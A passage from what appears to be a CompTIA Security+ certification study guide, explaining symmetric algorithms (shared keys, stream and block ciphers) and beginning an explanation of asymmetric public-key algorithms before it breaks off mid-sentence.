CompTIA Security+ Certification Symmetric algorithms Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key and vice versa. In most symmetric algorithms, the encryption and decryption keys are the same. These types of algorithms are also known as secretkey algorithms, single-key algorithms, or one-key algorithms, and they require the sender and receiver to agree on a key before they communicate securely. Therefore, the security of a symmetric algorithm lies with the key. If the key becomes known, anyone can access the encrypted information, as shown in Exhibit 14-1. Symmetric algorithms can be divided into two categories: stream algorithms and block algorithms. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits. Typical block sizes used in everyday computing today are 64 and 128 bits. This type of cryptography was once the only available way to transmit secret information. The obvious problem, of course, was the exchange of keysuntil the key is exchanged, encryption is impossible, but the value of the key makes its security critical. The solution is transmitting the private key over secure channels.

Exhibit 14-1: Encryption using a symmetric algorithm

Cryptography Asymmetric algorithms

145

In asymmetric algorithms, also known as public-key algorithms, the encryption key and the decryption key are different. Security of asymmetric algorithms is further enhanced by the fact that the decryption key cannot be calculated from the encryption key. Asymmetric algorithms allow for a given hosts encryption key to be made public. Anyone can use the key to encrypt data and send it to the host. However, only the host can